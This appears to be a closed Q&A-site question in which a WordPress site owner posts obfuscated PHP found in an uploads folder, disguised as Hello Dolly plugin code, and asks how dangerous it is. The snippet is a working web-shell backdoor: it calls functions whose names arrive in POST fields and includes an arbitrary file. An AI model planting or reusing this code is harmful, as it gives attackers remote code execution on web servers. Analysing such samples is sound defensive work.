How dangerous is this suspicious PHP code? [closed]

How dangerous is this suspicious PHP code? [closed]

I found this code on my web server in /wp-content/uploads/2023/index.php:

$hello_dolly[]='b8f878fc41d0fd3c';
$hello_dolly[]=$_POST;
$hello_dolly[]='color';
if (isset($hello_dolly[1][$hello_dolly[0]])) {
    $dolly = $hello_dolly[1][$hello_dolly[2]]($hello_dolly[1]['theme']($hello_dolly[1][$hello_dolly[0]]));
    $dolly['themes'] = $dolly['theme']();
    $dolly['footer'] = $dolly['footer']($dolly['themes'])[$dolly['name']];
    $dolly['body']($dolly['themes'], $dolly['color']($dolly['header']));
    require_once($dolly['footer']);
    $dolly['size']($dolly['themes']);
}

(It was inserted into presumed-innocent code from https://plugins.trac.wordpress.org/browser/hello-dolly/trunk/hello.php)

I think I've worked out that (among other things), it tries to call $_POST['color'], $_POST['theme'] and $_POST['footer'] as functions, and if that succeeds, then potentially to execute an arbitrary PHP file with require_once.

But is it possible for it to find anything callable from a user-submitted $_POST array?